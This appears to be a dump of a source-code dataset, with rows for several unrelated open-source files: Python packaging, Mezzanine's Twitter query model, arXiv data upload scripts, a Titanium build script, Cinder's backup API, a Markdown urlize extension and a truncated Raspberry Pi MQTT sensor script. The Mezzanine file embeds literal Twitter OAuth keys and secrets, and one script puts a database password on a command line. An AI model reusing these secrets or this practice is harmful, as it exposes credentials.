| repo_name (string, 5–92 chars) | path (string, 4–221 chars) | copies (string, 19 classes) | size (string, 4–6 chars) | content (string, 766–896k chars) | license (string, 15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51–99.9) | line_max (int64, 32–997) | alpha_frac (float64, 0.25–0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5–13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
chrisdickinson/multipart
|
setup.py
|
1
|
1572
|
from distutils.core import setup
import os
# Stolen from django-registration
# Compile the list of packages available, because distutils doesn't have
# an easy way to do this.
packages, data_files = [], []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
for dirpath, dirnames, filenames in os.walk('multipart'):
# Ignore dirnames that start with '.'
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
pkg = dirpath.replace(os.path.sep, '.')
if os.path.altsep:
pkg = pkg.replace(os.path.altsep, '.')
packages.append(pkg)
elif filenames:
        prefix = dirpath[len('multipart')+1:] # Strip "multipart/" or "multipart\"
for f in filenames:
data_files.append(os.path.join(prefix, f))
setup(
name='multipart',
version='0.1',
description='Two helper functions for creating multipart encoded bodies for httplib2',
author='Chris Dickinson',
author_email='chris.dickinson@domain51.com',
url='http://github.com/chrisdickinson/multipart/',
packages=packages,
package_data={'multipart': data_files},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities',
],
)
|
bsd-3-clause
| -832,142,934,570,517,000
| 32.446809
| 90
| 0.637405
| false
| 4.030769
| false
| false
| false
|
agepoly/mezzanine
|
mezzanine/twitter/models.py
|
1
|
6766
|
from __future__ import unicode_literals
from future.builtins import str
from datetime import datetime, timedelta
import re
from time import timezone
try:
from urllib.parse import quote
except ImportError:
# Python 2
from urllib import quote
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.html import urlize
from django.utils.timezone import get_default_timezone, make_aware
from django.utils.translation import ugettext_lazy as _
from requests_oauthlib import OAuth1
import requests
from mezzanine.conf import settings
from mezzanine.twitter import QUERY_TYPE_CHOICES, QUERY_TYPE_USER, \
QUERY_TYPE_LIST, QUERY_TYPE_SEARCH
from mezzanine.twitter import get_auth_settings
from mezzanine.twitter.managers import TweetManager
re_usernames = re.compile("@([0-9a-zA-Z+_]+)", re.IGNORECASE)
re_hashtags = re.compile("#([0-9a-zA-Z+_]+)", re.IGNORECASE)
replace_hashtags = "<a href=\"http://twitter.com/search?q=%23\\1\">#\\1</a>"
replace_usernames = "<a href=\"http://twitter.com/\\1\">@\\1</a>"
class TwitterQueryException(Exception):
pass
@python_2_unicode_compatible
class Query(models.Model):
type = models.CharField(_("Type"), choices=QUERY_TYPE_CHOICES,
max_length=10)
value = models.CharField(_("Value"), max_length=140)
interested = models.BooleanField("Interested", default=True)
class Meta:
verbose_name = _("Twitter query")
verbose_name_plural = _("Twitter queries")
ordering = ("-id",)
def __str__(self):
return "%s: %s" % (self.get_type_display(), self.value)
def run(self):
"""
Request new tweets from the Twitter API.
"""
try:
value = quote(self.value)
except KeyError:
value = self.value
urls = {
QUERY_TYPE_USER: ("https://api.twitter.com/1.1/statuses/"
"user_timeline.json?screen_name=%s"
"&include_rts=true" % value.lstrip("@")),
QUERY_TYPE_LIST: ("https://api.twitter.com/1.1/lists/statuses.json"
"?list_id=%s&include_rts=true" % value),
QUERY_TYPE_SEARCH: "https://api.twitter.com/1.1/search/tweets.json"
"?q=%s" % value,
}
try:
url = urls[self.type]
except KeyError:
raise TwitterQueryException("Invalid query type: %s" % self.type)
settings.use_editable()
auth_settings = get_auth_settings()
if not auth_settings:
from mezzanine.conf import registry
if self.value == registry["TWITTER_DEFAULT_QUERY"]["default"]:
# These are some read-only keys and secrets we use
# for the default query (eg nothing has been configured)
auth_settings = (
"KxZTRD3OBft4PP0iQW0aNQ",
"sXpQRSDUVJ2AVPZTfh6MrJjHfOGcdK4wRb1WTGQ",
"1368725588-ldWCsd54AJpG2xcB5nyTHyCeIC3RJcNVUAkB1OI",
"r9u7qS18t8ad4Hu9XVqmCGxlIpzoCN3e1vx6LOSVgyw3R",
)
else:
raise TwitterQueryException("Twitter OAuth settings missing")
try:
tweets = requests.get(url, auth=OAuth1(*auth_settings)).json()
except Exception as e:
raise TwitterQueryException("Error retrieving: %s" % e)
try:
raise TwitterQueryException(tweets["errors"][0]["message"])
except (IndexError, KeyError, TypeError):
pass
if self.type == "search":
tweets = tweets["statuses"]
for tweet_json in tweets:
remote_id = str(tweet_json["id"])
tweet, created = self.tweets.get_or_create(remote_id=remote_id)
if not created:
continue
if "retweeted_status" in tweet_json:
user = tweet_json['user']
tweet.retweeter_user_name = user["screen_name"]
tweet.retweeter_full_name = user["name"]
tweet.retweeter_profile_image_url = user["profile_image_url"]
tweet_json = tweet_json["retweeted_status"]
if self.type == QUERY_TYPE_SEARCH:
tweet.user_name = tweet_json['user']['screen_name']
tweet.full_name = tweet_json['user']['name']
tweet.profile_image_url = \
tweet_json['user']["profile_image_url"]
date_format = "%a %b %d %H:%M:%S +0000 %Y"
else:
user = tweet_json["user"]
tweet.user_name = user["screen_name"]
tweet.full_name = user["name"]
tweet.profile_image_url = user["profile_image_url"]
date_format = "%a %b %d %H:%M:%S +0000 %Y"
tweet.text = urlize(tweet_json["text"])
tweet.text = re_usernames.sub(replace_usernames, tweet.text)
tweet.text = re_hashtags.sub(replace_hashtags, tweet.text)
if getattr(settings, 'TWITTER_STRIP_HIGH_MULTIBYTE', False):
chars = [ch for ch in tweet.text if ord(ch) < 0x800]
tweet.text = ''.join(chars)
d = datetime.strptime(tweet_json["created_at"], date_format)
d -= timedelta(seconds=timezone)
tweet.created_at = make_aware(d, get_default_timezone())
try:
tweet.save()
except Warning:
pass
tweet.save()
self.interested = False
self.save()
class Tweet(models.Model):
remote_id = models.CharField(_("Twitter ID"), max_length=50)
created_at = models.DateTimeField(_("Date/time"), null=True)
text = models.TextField(_("Message"), null=True)
profile_image_url = models.URLField(_("Profile image URL"), null=True)
user_name = models.CharField(_("User name"), max_length=100, null=True)
full_name = models.CharField(_("Full name"), max_length=100, null=True)
retweeter_profile_image_url = models.URLField(
_("Profile image URL (Retweeted by)"), null=True)
retweeter_user_name = models.CharField(
_("User name (Retweeted by)"), max_length=100, null=True)
retweeter_full_name = models.CharField(
_("Full name (Retweeted by)"), max_length=100, null=True)
query = models.ForeignKey("Query", related_name="tweets")
objects = TweetManager()
class Meta:
verbose_name = _("Tweet")
verbose_name_plural = _("Tweets")
ordering = ("-created_at",)
def __str__(self):
return "%s: %s" % (self.user_name, self.text)
def is_retweet(self):
return self.retweeter_user_name is not None
|
bsd-2-clause
| 3,241,061,509,415,992,300
| 39.035503
| 79
| 0.585427
| false
| 3.736057
| false
| false
| false
|
arcolife/scholarec
|
corpus/dumps/data_handler.py
|
1
|
2830
|
#!/usr/bin/python
import os
import sys
import json
from subprocess import call
# path of directory containing all .json files
PATH_SOURCE = './data_arxiv_json/'
PATH_DEST = './sharded/'
def __write_json_files(path_source, path_dest, keyword):
'''
Create json chunks from a previous db dump (.json)
'''
# load dump
data = json.loads(open(path_source+'query_results'+keyword+'.json','rb').read())
for key in data.keys():
temp = data[key]
temp['ID'] = key.split('/')[-1]
temp['keyword'] = keyword
#jEncoder = json.JSONEncoder()
f = open(path_dest +temp['ID']+'.json','wb')
json.dump(temp, f)
f.close()
def __write_es_upload_script(path_dest):
'''
write content into bash script that
is supposed to upload chunks to ElasticSearch instance
'''
#list of all json filenames
filenames = os.listdir(path_dest)
FILE = open('es_upload', 'wb')
# write shell commands
FILE.write('#!/bin/bash\n')
FILE.write('cd ' + path_dest + '\n')
for filename in filenames:
# develop a command to upload files
CMD = ['curl','-XPOST',"'http://localhost:9200/arxiv/docs/" \
#+ filename.strip('.json') \
+ "'",'-d ','@'+filename]
FILE.write(' '.join(CMD) +"\n")
#call(CMD)
#print CMD
FILE.close()
def __write_mongo_upload_script(path_dest):
'''
write content into bash script that
is supposed to upload chunks to mongodb instance
'''
#list of all json filenames
filenames = os.listdir(path_dest)
FILE = open('mongo_upload', 'wb')
# write shell commands
FILE.write('#!/bin/bash\n')
FILE.write('cd ' + path_dest + ' \n')
passw = os.environ.get('mongo_scholarec_p')
for filename in filenames:
# develop a command to upload files
FILE.write('mongoimport --db scholarec -u arco -p ' + passw + ' --collection docs --file '+ \
filename + "\n")
#+ filename.strip('.json') \
FILE.close()
if __name__=='__main__':
'''
try:
# creat directory to dump individual json files
os.mkdir(PATH_DEST)
file_ = open('searchWords.lst', 'rb')
import ast
keywords = ast.literal_eval(file_.read())
file_.close()
for word in keywords:
__write_json_files(PATH_SOURCE, PATH_DEST, word)
except OSError:
print "Error: ", sys.exc_info()[1][1]
__write_es_upload_script(PATH_DEST)
'''
__write_mongo_upload_script(PATH_DEST)
'''
# set executable permission to shell script: ./_User_sharded/post
set_perm = ['chmod', '+x', 'es_upload']
call(set_perm)
# execute the script and upload json fiels to ES instance
call_post = ['./es_upload']
call(call_post)
'''
|
gpl-3.0
| -9,152,104,286,490,961,000
| 30.098901
| 101
| 0.579152
| false
| 3.600509
| false
| false
| false
|
caspahouzer/TiShineLabel
|
build.py
|
1
|
8791
|
#!/usr/bin/env python
#
# Appcelerator Titanium Module Packager
#
#
import os, subprocess, sys, glob, string, optparse
import zipfile
from datetime import date
cwd = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename))
os.chdir(cwd)
required_module_keys = ['name','version','moduleid','description','copyright','license','platform','minsdk']
module_defaults = {
'description':'My module',
'author': 'Your Name',
'license' : 'Specify your license',
'copyright' : 'Copyright (c) %s by Your Company' % str(date.today().year),
}
module_license_default = "TODO: place your license here and we'll include it in the module distribution"
def find_sdk(config):
sdk = config['TITANIUM_SDK']
return os.path.expandvars(os.path.expanduser(sdk))
def replace_vars(config,token):
idx = token.find('$(')
while idx != -1:
idx2 = token.find(')',idx+2)
if idx2 == -1: break
key = token[idx+2:idx2]
if not config.has_key(key): break
token = token.replace('$(%s)' % key, config[key])
idx = token.find('$(')
return token
def read_ti_xcconfig():
contents = open(os.path.join(cwd,'titanium.xcconfig')).read()
config = {}
for line in contents.splitlines(False):
line = line.strip()
if line[0:2]=='//': continue
idx = line.find('=')
if idx > 0:
key = line[0:idx].strip()
value = line[idx+1:].strip()
config[key] = replace_vars(config,value)
return config
def generate_doc(config):
docdir = os.path.join(cwd,'documentation')
if not os.path.exists(docdir):
warn("Couldn't find documentation file at: %s" % docdir)
return None
try:
import markdown2 as markdown
except ImportError:
import markdown
documentation = []
for file in os.listdir(docdir):
if file in ignoreFiles or os.path.isdir(os.path.join(docdir, file)):
continue
md = open(os.path.join(docdir,file)).read()
html = markdown.markdown(md)
documentation.append({file:html});
return documentation
def compile_js(manifest,config):
js_file = os.path.join(cwd,'assets','com.lightapps.TiShineLabel.js')
if not os.path.exists(js_file): return
from compiler import Compiler
try:
import json
except:
import simplejson as json
compiler = Compiler(cwd, manifest['moduleid'], manifest['name'], 'commonjs')
root_asset, module_assets = compiler.compile_module()
root_asset_content = """
%s
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[0]);
""" % root_asset
module_asset_content = """
%s
NSNumber *index = [map objectForKey:path];
if (index == nil) {
return nil;
}
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[index.integerValue]);
""" % module_assets
from tools import splice_code
assets_router = os.path.join(cwd,'Classes','ComLightappsTiShineLabelModuleAssets.m')
splice_code(assets_router, 'asset', root_asset_content)
splice_code(assets_router, 'resolve_asset', module_asset_content)
# Generate the exports after crawling all of the available JS source
exports = open('metadata.json','w')
json.dump({'exports':compiler.exports }, exports)
exports.close()
def die(msg):
print msg
sys.exit(1)
def info(msg):
print "[INFO] %s" % msg
def warn(msg):
print "[WARN] %s" % msg
def validate_license():
c = open(os.path.join(cwd,'LICENSE')).read()
if c.find(module_license_default)!=-1:
warn('please update the LICENSE file with your license text before distributing')
def validate_manifest():
	path = os.path.join(cwd,'manifest')
	if not os.path.exists(path): die("missing %s" % path)
	f = open(path)
manifest = {}
for line in f.readlines():
line = line.strip()
if line[0:1]=='#': continue
if line.find(':') < 0: continue
key,value = line.split(':')
manifest[key.strip()]=value.strip()
for key in required_module_keys:
if not manifest.has_key(key): die("missing required manifest key '%s'" % key)
if module_defaults.has_key(key):
defvalue = module_defaults[key]
curvalue = manifest[key]
if curvalue==defvalue: warn("please update the manifest key: '%s' to a non-default value" % key)
return manifest,path
ignoreFiles = ['.DS_Store','.gitignore','libTitanium.a','titanium.jar','README']
ignoreDirs = ['.DS_Store','.svn','.git','CVSROOT']
def zip_dir(zf,dir,basepath,ignoreExt=[]):
if not os.path.exists(dir): return
for root, dirs, files in os.walk(dir):
for name in ignoreDirs:
if name in dirs:
dirs.remove(name) # don't visit ignored directories
for file in files:
if file in ignoreFiles: continue
e = os.path.splitext(file)
if len(e) == 2 and e[1] in ignoreExt: continue
from_ = os.path.join(root, file)
to_ = from_.replace(dir, '%s/%s'%(basepath,dir), 1)
zf.write(from_, to_)
def glob_libfiles():
files = []
for libfile in glob.glob('build/**/*.a'):
if libfile.find('Release-')!=-1:
files.append(libfile)
return files
def build_module(manifest,config):
from tools import ensure_dev_path
ensure_dev_path()
rc = os.system("xcodebuild -sdk iphoneos -configuration Release")
if rc != 0:
die("xcodebuild failed")
rc = os.system("xcodebuild -sdk iphonesimulator -configuration Release")
if rc != 0:
die("xcodebuild failed")
# build the merged library using lipo
moduleid = manifest['moduleid']
libpaths = ''
for libfile in glob_libfiles():
libpaths+='%s ' % libfile
os.system("lipo %s -create -output build/lib%s.a" %(libpaths,moduleid))
def generate_apidoc(apidoc_build_path):
global options
if options.skip_docs:
info("Skipping documentation generation.")
return False
else:
info("Module apidoc generation can be skipped using --skip-docs")
apidoc_path = os.path.join(cwd, "apidoc")
if not os.path.exists(apidoc_path):
warn("Skipping apidoc generation. No apidoc folder found at: %s" % apidoc_path)
return False
if not os.path.exists(apidoc_build_path):
os.makedirs(apidoc_build_path)
ti_root = string.strip(subprocess.check_output(["echo $TI_ROOT"], shell=True))
if not len(ti_root) > 0:
warn("Not generating documentation from the apidoc folder. The titanium_mobile repo could not be found.")
warn("Set the TI_ROOT environment variable to the parent folder where the titanium_mobile repo resides (eg.'export TI_ROOT=/Path').")
return False
docgen = os.path.join(ti_root, "titanium_mobile", "apidoc", "docgen.py")
if not os.path.exists(docgen):
warn("Not generating documentation from the apidoc folder. Couldn't find docgen.py at: %s" % docgen)
return False
info("Generating documentation from the apidoc folder.")
rc = os.system("\"%s\" --format=jsca,modulehtml --css=styles.css -o \"%s\" -e \"%s\"" % (docgen, apidoc_build_path, apidoc_path))
if rc != 0:
die("docgen failed")
return True
def package_module(manifest,mf,config):
name = manifest['name'].lower()
moduleid = manifest['moduleid'].lower()
version = manifest['version']
modulezip = '%s-iphone-%s.zip' % (moduleid,version)
if os.path.exists(modulezip): os.remove(modulezip)
zf = zipfile.ZipFile(modulezip, 'w', zipfile.ZIP_DEFLATED)
modulepath = 'modules/iphone/%s/%s' % (moduleid,version)
zf.write(mf,'%s/manifest' % modulepath)
libname = 'lib%s.a' % moduleid
zf.write('build/%s' % libname, '%s/%s' % (modulepath,libname))
docs = generate_doc(config)
if docs!=None:
for doc in docs:
for file, html in doc.iteritems():
filename = string.replace(file,'.md','.html')
zf.writestr('%s/documentation/%s'%(modulepath,filename),html)
apidoc_build_path = os.path.join(cwd, "build", "apidoc")
if generate_apidoc(apidoc_build_path):
for file in os.listdir(apidoc_build_path):
if file in ignoreFiles or os.path.isdir(os.path.join(apidoc_build_path, file)):
continue
zf.write(os.path.join(apidoc_build_path, file), '%s/documentation/apidoc/%s' % (modulepath, file))
zip_dir(zf,'assets',modulepath,['.pyc','.js'])
zip_dir(zf,'example',modulepath,['.pyc'])
zip_dir(zf,'platform',modulepath,['.pyc','.js'])
zf.write('LICENSE','%s/LICENSE' % modulepath)
zf.write('module.xcconfig','%s/module.xcconfig' % modulepath)
exports_file = 'metadata.json'
if os.path.exists(exports_file):
zf.write(exports_file, '%s/%s' % (modulepath, exports_file))
zf.close()
if __name__ == '__main__':
global options
parser = optparse.OptionParser()
parser.add_option("-s", "--skip-docs",
dest="skip_docs",
action="store_true",
help="Will skip building documentation in apidoc folder",
default=False)
(options, args) = parser.parse_args()
manifest,mf = validate_manifest()
validate_license()
config = read_ti_xcconfig()
sdk = find_sdk(config)
sys.path.insert(0,os.path.join(sdk,'iphone'))
sys.path.append(os.path.join(sdk, "common"))
compile_js(manifest,config)
build_module(manifest,config)
package_module(manifest,mf,config)
sys.exit(0)
|
mit
| 4,717,175,354,227,685,000
| 30.967273
| 135
| 0.694574
| false
| 2.963924
| true
| false
| false
|
hall1467/wikidata_usage_tracking
|
python_analysis_scripts/longitudinal_misalignment/alignment_and_misalignment_table_pre_processor.py
|
1
|
2373
|
"""
Preprocess alignment and misalignment data so that it can be imported into
Postgres
Usage:
alignment_and_misalignment_table_pre_processor (-h|--help)
alignment_and_misalignment_table_pre_processor <output> <input_alignment_data>...
[--debug]
[--verbose]
Options:
-h, --help This help message is printed
<input_alignment_data> Path to file to process.
<output> Where output will be written
--debug Print debug logging to stderr
--verbose Print dots and stuff to stderr
"""
import docopt
import logging
import operator
from collections import defaultdict
import mysqltsv
import bz2
import re
import sys
logger = logging.getLogger(__name__)
MISALIGNMENT_FILE_RE =\
re.compile(r'.*\/(\d\d\d\d\d\d)_misaligned\.tsv')
ALIGNMENT_FILE_RE =\
re.compile(r'.*\/(\d\d\d\d\d\d)_aligned\.tsv')
def main(argv=None):
args = docopt.docopt(__doc__)
logging.basicConfig(
level=logging.INFO if not args['--debug'] else logging.DEBUG,
format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
)
input_alignment_data = args['<input_alignment_data>']
output_file = mysqltsv.Writer(open(args['<output>'], "w"))
verbose = args['--verbose']
run(input_alignment_data, output_file, verbose)
def run(input_alignment_data, output_file, verbose):
for f in input_alignment_data:
if verbose:
sys.stderr.write("Processing: {0}\n".format(f))
sys.stderr.flush()
if MISALIGNMENT_FILE_RE.match(f):
date = MISALIGNMENT_FILE_RE.match(f).group(1)
file_type = "ma"
elif ALIGNMENT_FILE_RE.match(f):
date = ALIGNMENT_FILE_RE.match(f).group(1)
file_type = "a"
else:
raise RuntimeError("Incorrect filename: {0}".format(f))
for i, line in enumerate(mysqltsv.Reader(open(f, "r"), headers=False,
types=[str, str, str])):
output_file.write([line[0], int(date[0:4]), int(date[4:6]), line[2],
line[1]])
if verbose and i % 10000 == 0 and i != 0:
sys.stderr.write("\tEntities processed: {0}\n".format(i))
sys.stderr.flush()
main()
|
mit
| -126,529,642,722,674,400
| 26.275862
| 85
| 0.585335
| false
| 3.62844
| false
| false
| false
|
NeCTAR-RC/cinder
|
cinder/backup/api.py
|
1
|
11074
|
# Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Handles all requests relating to the volume backups service.
"""
from eventlet import greenthread
from oslo.config import cfg
from cinder.backup import rpcapi as backup_rpcapi
from cinder import context
from cinder.db import base
from cinder import exception
from cinder.openstack.common import log as logging
from cinder import utils
import cinder.policy
import cinder.volume
from cinder.volume import utils as volume_utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def check_policy(context, action):
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
_action = 'backup:%s' % action
cinder.policy.enforce(context, _action, target)
class API(base.Base):
"""API for interacting with the volume backup manager."""
def __init__(self, db_driver=None):
self.backup_rpcapi = backup_rpcapi.BackupAPI()
self.volume_api = cinder.volume.API()
super(API, self).__init__(db_driver)
def get(self, context, backup_id):
check_policy(context, 'get')
rv = self.db.backup_get(context, backup_id)
return dict(rv.iteritems())
def delete(self, context, backup_id):
"""Make the RPC call to delete a volume backup."""
check_policy(context, 'delete')
backup = self.get(context, backup_id)
if backup['status'] not in ['available', 'error']:
msg = _('Backup status must be available or error')
raise exception.InvalidBackup(reason=msg)
self.db.backup_update(context, backup_id, {'status': 'deleting'})
self.backup_rpcapi.delete_backup(context,
backup['host'],
backup['id'])
# TODO(moorehef): Add support for search_opts, discarded atm
def get_all(self, context, search_opts=None):
if search_opts is None:
search_opts = {}
check_policy(context, 'get_all')
if context.is_admin:
backups = self.db.backup_get_all(context)
else:
backups = self.db.backup_get_all_by_project(context,
context.project_id)
return backups
def _is_backup_service_enabled(self, volume, volume_host):
"""Check if there is a backup service available."""
topic = CONF.backup_topic
ctxt = context.get_admin_context()
services = self.db.service_get_all_by_topic(ctxt, topic)
for srv in services:
if (srv['availability_zone'] == volume['availability_zone'] and
srv['host'] == volume_host and not srv['disabled'] and
utils.service_is_up(srv)):
return True
return False
def _list_backup_services(self):
"""List all enabled backup services.
:returns: list -- hosts for services that are enabled for backup.
"""
topic = CONF.backup_topic
ctxt = context.get_admin_context()
services = self.db.service_get_all_by_topic(ctxt, topic)
return [srv['host'] for srv in services if not srv['disabled']]
def create(self, context, name, description, volume_id,
container, availability_zone=None):
"""Make the RPC call to create a volume backup."""
check_policy(context, 'create')
volume = self.volume_api.get(context, volume_id)
if volume['status'] != "available":
msg = _('Volume to be backed up must be available')
raise exception.InvalidVolume(reason=msg)
volume_host = volume_utils.extract_host(volume['host'], 'host')
if not self._is_backup_service_enabled(volume, volume_host):
raise exception.ServiceNotFound(service_id='cinder-backup')
self.db.volume_update(context, volume_id, {'status': 'backing-up'})
options = {'user_id': context.user_id,
'project_id': context.project_id,
'display_name': name,
'display_description': description,
'volume_id': volume_id,
'status': 'creating',
'container': container,
'size': volume['size'],
'host': volume_host, }
backup = self.db.backup_create(context, options)
#TODO(DuncanT): In future, when we have a generic local attach,
# this can go via the scheduler, which enables
# better load balancing and isolation of services
self.backup_rpcapi.create_backup(context,
backup['host'],
backup['id'],
volume_id)
return backup
def restore(self, context, backup_id, volume_id=None):
"""Make the RPC call to restore a volume backup."""
check_policy(context, 'restore')
backup = self.get(context, backup_id)
if backup['status'] != 'available':
msg = _('Backup status must be available')
raise exception.InvalidBackup(reason=msg)
size = backup['size']
if size is None:
msg = _('Backup to be restored has invalid size')
raise exception.InvalidBackup(reason=msg)
# Create a volume if none specified. If a volume is specified check
# it is large enough for the backup
if volume_id is None:
name = 'restore_backup_%s' % backup_id
description = 'auto-created_from_restore_from_backup'
LOG.audit(_("Creating volume of %(size)s GB for restore of "
"backup %(backup_id)s"),
{'size': size, 'backup_id': backup_id},
context=context)
volume = self.volume_api.create(context, size, name, description)
volume_id = volume['id']
while True:
volume = self.volume_api.get(context, volume_id)
if volume['status'] != 'creating':
break
greenthread.sleep(1)
else:
volume = self.volume_api.get(context, volume_id)
if volume['status'] != "available":
msg = _('Volume to be restored to must be available')
raise exception.InvalidVolume(reason=msg)
LOG.debug('Checking backup size %s against volume size %s',
size, volume['size'])
if size > volume['size']:
msg = (_('volume size %(volume_size)d is too small to restore '
'backup of size %(size)d.') %
{'volume_size': volume['size'], 'size': size})
raise exception.InvalidVolume(reason=msg)
LOG.audit(_("Overwriting volume %(volume_id)s with restore of "
"backup %(backup_id)s"),
{'volume_id': volume_id, 'backup_id': backup_id},
context=context)
# Setting the status here rather than setting at start and unrolling
# for each error condition, it should be a very small window
self.db.backup_update(context, backup_id, {'status': 'restoring'})
self.db.volume_update(context, volume_id, {'status':
'restoring-backup'})
self.backup_rpcapi.restore_backup(context,
backup['host'],
backup['id'],
volume_id)
d = {'backup_id': backup_id,
'volume_id': volume_id, }
return d
def export_record(self, context, backup_id):
"""Make the RPC call to export a volume backup.
Call backup manager to execute backup export.
:param context: running context
:param backup_id: backup id to export
:returns: dictionary -- a description of how to import the backup
:returns: contains 'backup_url' and 'backup_service'
:raises: InvalidBackup
"""
check_policy(context, 'backup-export')
backup = self.get(context, backup_id)
if backup['status'] != 'available':
msg = (_('Backup status must be available and not %s.') %
backup['status'])
raise exception.InvalidBackup(reason=msg)
LOG.debug("Calling RPCAPI with context: "
"%(ctx)s, host: %(host)s, backup: %(id)s.",
{'ctx': context,
'host': backup['host'],
'id': backup['id']})
export_data = self.backup_rpcapi.export_record(context,
backup['host'],
backup['id'])
return export_data
def import_record(self, context, backup_service, backup_url):
"""Make the RPC call to import a volume backup.
:param context: running context
:param backup_service: backup service name
:param backup_url: backup description to be used by the backup driver
:raises: InvalidBackup
:raises: ServiceNotFound
"""
check_policy(context, 'backup-import')
# NOTE(ronenkat): since we don't have a backup-scheduler
# we need to find a host that support the backup service
# that was used to create the backup.
# We send it to the first backup service host, and the backup manager
# on that host will forward it to other hosts on the hosts list if it
# cannot support correct service itself.
hosts = self._list_backup_services()
if len(hosts) == 0:
raise exception.ServiceNotFound(service_id=backup_service)
options = {'user_id': context.user_id,
'project_id': context.project_id,
'volume_id': '0000-0000-0000-0000',
'status': 'creating', }
backup = self.db.backup_create(context, options)
first_host = hosts.pop()
self.backup_rpcapi.import_record(context,
first_host,
backup['id'],
backup_service,
backup_url,
hosts)
return backup
|
apache-2.0
| -4,439,977,846,825,401,300
| 39.123188
| 78
| 0.559689
| false
| 4.503457
| false
| false
| false
|
zestedesavoir/Python-ZMarkdown
|
zmarkdown/extensions/urlize.py
|
1
|
2230
|
# Inspired by https://github.com/r0wb0t/markdown-urlize/blob/master/urlize.py
from __future__ import unicode_literals
from zmarkdown.inlinepatterns import Pattern as InlinePattern, sanitize_url, MAIL_RE
from zmarkdown import Extension, util
try: # pragma: no cover
from urllib.parse import urlparse
except ImportError: # pragma: no cover
from urlparse import urlparse
import re
# Global Vars. Do not catch ending dot
URLIZE_RE = r'(^|(?<=\s))({0})(?=\.?(\s|$))'.format("|".join((
# mail adress (two lines):
MAIL_RE,
# Anything with protocol between < >
r"<(?:f|ht)tps?://[^>]*>",
# with protocol : any valid domain match.
r"((?:f|ht)tps?://)([\da-z\.-]+)\.([a-z\.]{1,5}[a-z])([/\w\.$%&_?#=()'-]*[/\w$%&_?#=()'-])?\/?",
# without protocol, only somes specified protocols match
r"((?:f|ht)tps?://)?([\da-z\.-]+)\.(?:com|net|org|fr)([/\w\.$%&_?#=()'-]*[/\w$%&_?#=()'-])?\/?")))
class UrlizePattern(InlinePattern):
""" Return a link Element given an autolink (`http://example/com`). """
def __init__(self, *args, **kwargs):
kwargs["not_in"] = ('link',)
InlinePattern.__init__(self, *args, **kwargs)
def handleMatch(self, m):
url = m.group(3)
if url.startswith('<'):
url = url[1:-1]
text = url
is_url = re.match(MAIL_RE, url)
if not is_url:
url = sanitize_url(url)
parts = urlparse(url)
# If no protocol (and not explicit relative link), add one
if parts[0] == "":
if is_url:
url = 'mailto:' + url
elif not url.startswith("#") and not url.startswith("/"):
url = 'http://' + url
el = util.etree.Element("a")
el.set('href', url)
el.text = util.AtomicString(text)
return el
class UrlizeExtension(Extension):
""" Urlize Extension for Python-Markdown. """
def extendZMarkdown(self, md, md_globals):
""" Replace autolink with UrlizePattern """
md.inlinePatterns['autolink'] = UrlizePattern(URLIZE_RE, md)
def makeExtension(*args, **kwargs):
return UrlizeExtension(*args, **kwargs)
|
bsd-3-clause
| -4,029,473,678,313,161,700
| 30.794118
| 102
| 0.54574
| false
| 3.36858
| false
| false
| false
|
paritoshsingh/konehack
|
read_and_send_msg.py
|
1
|
2879
|
#!/usr/bin/python
import smbus
import math
import paho.mqtt.client as mqtt
# Power management registers
power_mgmt_1 = 0x6b
power_mgmt_2 = 0x6c
def read_byte(adr):
return bus.read_byte_data(address, adr)
def read_word(adr):
high = bus.read_byte_data(address, adr)
low = bus.read_byte_data(address, adr+1)
val = (high << 8) + low
return val
def read_word_2c(adr):
val = read_word(adr)
if (val >= 0x8000):
return -((65535 - val) + 1)
else:
return val
def dist(a,b):
return math.sqrt((a*a)+(b*b))
def get_y_rotation(x,y,z):
radians = math.atan2(x, dist(y,z))
return -math.degrees(radians)
def get_x_rotation(x,y,z):
radians = math.atan2(y, dist(x,z))
return math.degrees(radians)
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
    print("Connected with result code "+str(rc))
    # Subscribing in on_connect() means that if we lose the connection and
    # reconnect then subscriptions will be renewed.
    client.subscribe("$SYS/#")
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
print(msg.topic+" "+str(msg.payload))
bus = smbus.SMBus(1) # or bus = smbus.SMBus(0) for Revision 1 boards
address = 0x68       # This is the address value read via the i2cdetect command
# Now wake the 6050 up as it starts in sleep mode
bus.write_byte_data(address, power_mgmt_1, 0)
# Set up the MQTT client before entering the sensor loop so it exists when used,
# and run its network handling in a background thread.
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect("iot.eclipse.org", 1883, 60)
client.loop_start()
while 1:
# print "gyro data"
# print "---------"
gyro_xout = read_word_2c(0x43)
gyro_yout = read_word_2c(0x45)
gyro_zout = read_word_2c(0x47)
print "gyro_xout: ", gyro_xout, " scaled: ", (gyro_xout / 131)
print "gyro_yout: ", gyro_yout, " scaled: ", (gyro_yout / 131)
